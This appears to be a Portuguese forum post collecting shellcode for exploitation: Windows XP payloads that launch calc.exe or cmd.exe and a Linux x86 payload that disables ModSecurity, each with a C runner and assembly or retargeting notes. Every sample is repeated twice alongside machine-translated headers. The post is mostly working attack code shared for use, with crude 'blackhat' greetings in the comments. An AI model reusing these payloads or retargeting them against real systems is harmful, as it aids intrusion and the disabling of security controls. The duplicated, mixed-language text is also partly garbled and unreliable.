Tweet
File: Windows XP Home Edition SP3 English (calc.exe) 37 bytes Arquivo: Windows XP Home Edition SP3 Inglês (calc.exe) 37 bytes
Author: Hazem mofeed Autor: Hazem mofeed
File: Windows Xp Home Edition SP2 English (calc.exe) 37 bytes Arquivo: Windows XP Home Edition SP2 Inglês (calc.exe) 37 bytes
Author: Hazem mofeed Autor: Hazem mofeed
File: Linux x86 - disabled modsecurity - 64 bytes Arquivo: Linux x86 - modsecurity deficiências - 64 bytes
Author: sekfault Autor: sekfault
Arquivo: Win32 (Cmd.exe) para XP SP2 turco 26 Bytes
Author: Hellcode Research Autor: Hellcode Investigação
File: Win32 (cmd.exe) for XP SP3 English 26 Bytes Bytes do arquivo: Win32 (Cmd.exe) para o XP SP3 Inglês 26
Author: Hellcode Research Autor: Hellcode Investigação
Ate a Proxima Galera
Author: Hazem mofeed Autor: Hazem mofeed
/*
* Windows Xp Home edition SP3 english ( calc.exe ) 37 bytes shellcode
* by: Hazem mofeed
* The Shellcode: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
* Modified to working In SP3,
* Home: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
* greetz: ProViDoR , ExH , rUnVirUs , Sinaritx , Data_fr34k3r , Br1ght D@rk
*/
char evil[] =
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\ xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\ xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) evil;
(int)(*shellcode)();
}
* Windows Xp Home edition SP3 english ( calc.exe ) 37 bytes shellcode
* by: Hazem mofeed
* The Shellcode: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
* Modified to working In SP3,
* Home: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
* greetz: ProViDoR , ExH , rUnVirUs , Sinaritx , Data_fr34k3r , Br1ght D@rk
*/
char evil[] =
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\ xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\ xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) evil;
(int)(*shellcode)();
}
Author: Hazem mofeed Autor: Hazem mofeed
/*
* Windows Xp Home edition SP2 english ( calc.exe ) 37 bytes shellcode
* by: Hazem mofeed Aka Hakxer
* penetration testing labs
* Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
*/
char evil[] =
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x8d\x15\x86\x7c\ xff\xd3\x31\xc0"
"\x50\xbb\xea\xcd\x81\x7c\xff\xd3\xe8\xe5\xff\xff\ xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) evil;
(int)(*shellcode)();
}
* Windows Xp Home edition SP2 english ( calc.exe ) 37 bytes shellcode
* by: Hazem mofeed Aka Hakxer
* penetration testing labs
* Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
*/
char evil[] =
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x8d\x15\x86\x7c\ xff\xd3\x31\xc0"
"\x50\xbb\xea\xcd\x81\x7c\xff\xd3\xe8\xe5\xff\xff\ xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) evil;
(int)(*shellcode)();
}
File: Linux x86 - disabled modsecurity - 64 bytes Arquivo: Linux x86 - modsecurity deficiências - 64 bytes
Author: sekfault Autor: sekfault
/* sekfault@shellcode.com.ar - Goodfellas Security Research Team - 2010
* /usr/sbin/a2dismod mod-security2 - disable modsecurity
* 64 bytes
*__asm__(
* "xor %eax,%eax \n"
* "push %eax \n"
* "cdq \n"
* "push $0x646f6d73 \n"
* "push $0x69643261 \n"
* "push $0x2f6e6962 \n"
* "push $0x732f7273 \n"
* "push $0x752f2f2f \n"
* "mov %esp,%ebx \n"
* "push $0x32 \n"
* "push $0x79746972 \n"
* "push $0x75636573 \n"
* "push $0x2d646f6d \n"
* "mov %esp,%ecx \n"
* "xor %edx,%edx \n"
* "mov $0xb,%al \n"
* "push %edx \n"
* "push %ecx \n"
* "push %ebx \n"
* "mov %esp,%ecx \n"
* "mov %esp,%edx \n"
* "int $0x80 \n"
);
*/
char shellcode[]="\x31\xc0\x50\x99\x68\x73\x6d\x6f\x64\x68\x61\x32 \x64\x69\x68\x62\x69\x6e\x2f\x68\x73\x72\x2f\x73\x 68\x2f\x2f\x2f\x75\x89\xe3\x6a\x32\x68\x72\x69\x74 \x79\x68\x73\x65\x63\x75\x68\x6d\x6f\x64\x2d\x89\x e1\x31\xd2\xb0\x0b\x52\x51\x53\x89\xe1\x89\xe2\xcd \x80";
int main()
{
(*(void(*)())shellcode)();
return 0;
}
* /usr/sbin/a2dismod mod-security2 - disable modsecurity
* 64 bytes
*__asm__(
* "xor %eax,%eax \n"
* "push %eax \n"
* "cdq \n"
* "push $0x646f6d73 \n"
* "push $0x69643261 \n"
* "push $0x2f6e6962 \n"
* "push $0x732f7273 \n"
* "push $0x752f2f2f \n"
* "mov %esp,%ebx \n"
* "push $0x32 \n"
* "push $0x79746972 \n"
* "push $0x75636573 \n"
* "push $0x2d646f6d \n"
* "mov %esp,%ecx \n"
* "xor %edx,%edx \n"
* "mov $0xb,%al \n"
* "push %edx \n"
* "push %ecx \n"
* "push %ebx \n"
* "mov %esp,%ecx \n"
* "mov %esp,%edx \n"
* "int $0x80 \n"
);
*/
char shellcode[]="\x31\xc0\x50\x99\x68\x73\x6d\x6f\x64\x68\x61\x32 \x64\x69\x68\x62\x69\x6e\x2f\x68\x73\x72\x2f\x73\x 68\x2f\x2f\x2f\x75\x89\xe3\x6a\x32\x68\x72\x69\x74 \x79\x68\x73\x65\x63\x75\x68\x6d\x6f\x64\x2d\x89\x e1\x31\xd2\xb0\x0b\x52\x51\x53\x89\xe1\x89\xe2\xcd \x80";
int main()
{
(*(void(*)())shellcode)();
return 0;
}
Arquivo: Win32 (Cmd.exe) para XP SP2 turco 26 Bytes
Author: Hellcode Research Autor: Hellcode Investigação
/*
26 Bytes Win32 Shellcode (cmd.exe) for XP SP2 Turkish
Author: Hellcode Research || TCC (The Computer Cheats)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
memberz: celil 'karak0rsan unuver , murderkey, murat kaslioglu, bob
from murderkey: I love you merve lol
from karak0rsan: fuck u "ysmn" lol || eternal love kubr4 ||
notebookumu calan hirsiz kurcalarsa l33t h4x0r olabilir ahahaha :]
merak etme mkey, en kisa zamanda giden 0dayleri tekrar toplucam ;]
Greetz: AhmetBSD aka L4M3R, GOBBLES and all blackhat community
"\xc7\x93\xc1\x77" is the system address. (0x77c193c7)
You can change it if you use another XP. (e.g SP2 FR, SP3 Turkish etc.)
(Open MSVCRT.DLL via Dependency Walker,
find system function's address and MSVCRT's Preferred Base address
system + preferred base = System Address ;] )
*/
#include <windows.h>
#include <winbase.h>
unsigned char hellcodenet[]=
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc1\x77"
"\xff\xd0"
;
int main ()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)hellcodenet;
return 0;
}
26 Bytes Win32 Shellcode (cmd.exe) for XP SP2 Turkish
Author: Hellcode Research || TCC (The Computer Cheats)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
memberz: celil 'karak0rsan unuver , murderkey, murat kaslioglu, bob
from murderkey: I love you merve lol
from karak0rsan: fuck u "ysmn" lol || eternal love kubr4 ||
notebookumu calan hirsiz kurcalarsa l33t h4x0r olabilir ahahaha :]
merak etme mkey, en kisa zamanda giden 0dayleri tekrar toplucam ;]
Greetz: AhmetBSD aka L4M3R, GOBBLES and all blackhat community
"\xc7\x93\xc1\x77" is the system address. (0x77c193c7)
You can change it if you use another XP. (e.g SP2 FR, SP3 Turkish etc.)
(Open MSVCRT.DLL via Dependency Walker,
find system function's address and MSVCRT's Preferred Base address
system + preferred base = System Address ;] )
*/
#include <windows.h>
#include <winbase.h>
unsigned char hellcodenet[]=
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc1\x77"
"\xff\xd0"
;
int main ()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)hellcodenet;
return 0;
}
File: Win32 (cmd.exe) for XP SP3 English 26 Bytes Bytes do arquivo: Win32 (Cmd.exe) para o XP SP3 Inglês 26
Author: Hellcode Research Autor: Hellcode Investigação
/*
26 Bytes Win32 Shellcode (cmd.exe) for XP SP3 English
Author: Hellcode Research || TCC (The Computer Cheats)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
memberz: celil 'karak0rsan unuver , murderkey, murat kaslioglu, bob
from murderkey: I love you merve lol
from karak0rsan: fuck u "ysmn" lol || eternal love kubr4 ||
notebookumu calan hirsiz kurcalarsa l33t h4x0r olabilir ahahaha :]
merak etme mkey, en kisa zamanda giden 0dayleri tekrar toplucam ;]
Greetz: AhmetBSD aka L4M3R, GOBBLES and all blackhat community
"\xc7\x93\xc2\x77" is the system address. (0x77c293c7)
You can change it if you use another XP. (e.g SP2 FR, SP3 Turkish etc.)
(Open MSVCRT.DLL via Dependency Walker,
find system function's address and MSVCRT's Preferred Base address
system + preferred base = System Address ;] )
*/
#include <windows.h>
#include <winbase.h>
unsigned char hellcodenet[]=
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0"
;
int main ()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)hellcodenet;
return 0;
}
26 Bytes Win32 Shellcode (cmd.exe) for XP SP3 English
Author: Hellcode Research || TCC (The Computer Cheats)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
memberz: celil 'karak0rsan unuver , murderkey, murat kaslioglu, bob
from murderkey: I love you merve lol
from karak0rsan: fuck u "ysmn" lol || eternal love kubr4 ||
notebookumu calan hirsiz kurcalarsa l33t h4x0r olabilir ahahaha :]
merak etme mkey, en kisa zamanda giden 0dayleri tekrar toplucam ;]
Greetz: AhmetBSD aka L4M3R, GOBBLES and all blackhat community
"\xc7\x93\xc2\x77" is the system address. (0x77c293c7)
You can change it if you use another XP. (e.g SP2 FR, SP3 Turkish etc.)
(Open MSVCRT.DLL via Dependency Walker,
find system function's address and MSVCRT's Preferred Base address
system + preferred base = System Address ;] )
*/
#include <windows.h>
#include <winbase.h>
unsigned char hellcodenet[]=
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0"
;
int main ()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)hellcodenet;
return 0;
}
Ate a Proxima Galera
